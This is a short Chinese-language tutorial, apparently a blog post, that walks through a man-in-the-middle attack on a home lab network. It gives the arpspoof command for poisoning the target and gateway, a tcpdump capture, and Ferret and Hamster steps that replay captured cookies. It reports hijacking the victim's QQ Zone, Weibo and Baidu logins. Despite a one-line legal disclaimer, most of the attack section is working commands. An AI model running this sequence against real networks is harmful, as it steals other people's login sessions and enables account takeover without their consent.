中間人攻擊(Man-in-the-MiddleAttack,簡稱“MITM攻擊”)是一種“間接”的入侵攻擊,這種攻擊模式是通過各種技術手段將受入侵者控制的一臺計算機虛擬放置在網絡連接中的兩臺通信計算機之間,這臺計算機就稱爲“中間人”。
本文所討論的攻擊方法僅供技術交流,禁止違法使用
工具
kali:
- arpspoof:arp欺騙
- tcpdump:dump數據包
- Ferret:處理數據包
- Hamster:提供web服務交互控制
拓撲
靶機:windows 7 (ip:192.168.1.114)
攻擊機:kali 3.14(ip:192.168.1.118)
網關:192.168.1.1
攻擊
網絡連通
攻擊機ping靶機,確保可以ping通
arp欺騙
arpspoof -i eth0 -t 192.168.1.1 192.168.1.114
抓取數據包
tcpdump -i eth0 -w cookie.cap
受害者登陸
模擬靶機受害者登陸QQ空間,新浪微博,百度
QQ空間
微博
百度
而攻擊機是沒有登陸這些網站的:
處理數據包
ferret -r cookie.cap
生成hamster.txt
開啓hamster服務
hamster
打開瀏覽器代理
尋找敏感地址
百度劫持成功
微博劫持成功
qq空間劫持成功
後
實現中間人攻擊的方式有很多,這只是其中一種,ettercap一鍵抓取,dsploit……都可以實現。
技術簡單,大牛勿噴!